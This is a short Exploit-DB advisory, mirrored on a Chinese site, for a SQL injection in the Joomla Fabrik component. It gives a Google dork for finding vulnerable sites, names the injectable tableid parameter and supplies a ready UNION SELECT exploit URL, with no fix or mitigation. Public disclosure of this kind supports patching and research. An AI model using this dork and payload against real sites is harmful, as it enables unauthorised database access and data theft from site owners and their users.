Joomla! Component Fabrik – SQL Injection - 体验盒子

作者： Mkr0x

日期： 2010-08-21

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/14707/

$##################################################################$
# +==============================================================+ 
# | Joomla Component (com_Fabrik) SQL Injection Vulnerability| 
# +==============================================================+ 
# Vendor : http://fabrikar.com/
# Author : Mkr0x
# Home : www.kernel.ge
# E-mail : mkrcard@gmail.com
# Place : Georgia
$##################################################################$
# Dork : 
 index.php?option=com_fabrik
--
# Vulnerable : 
 http://[target]/index.php?option=com_fabrik&view=table&tableid=[SQL]
--
# Exploit : 
 http://[target]/index.php?option=com_fabrik&view=table&tableid=13+union+select+1--
--

 Best Regards 
-Mkr0x-

# „Georgia has always been at the foreground“ .. 
$##################################################################$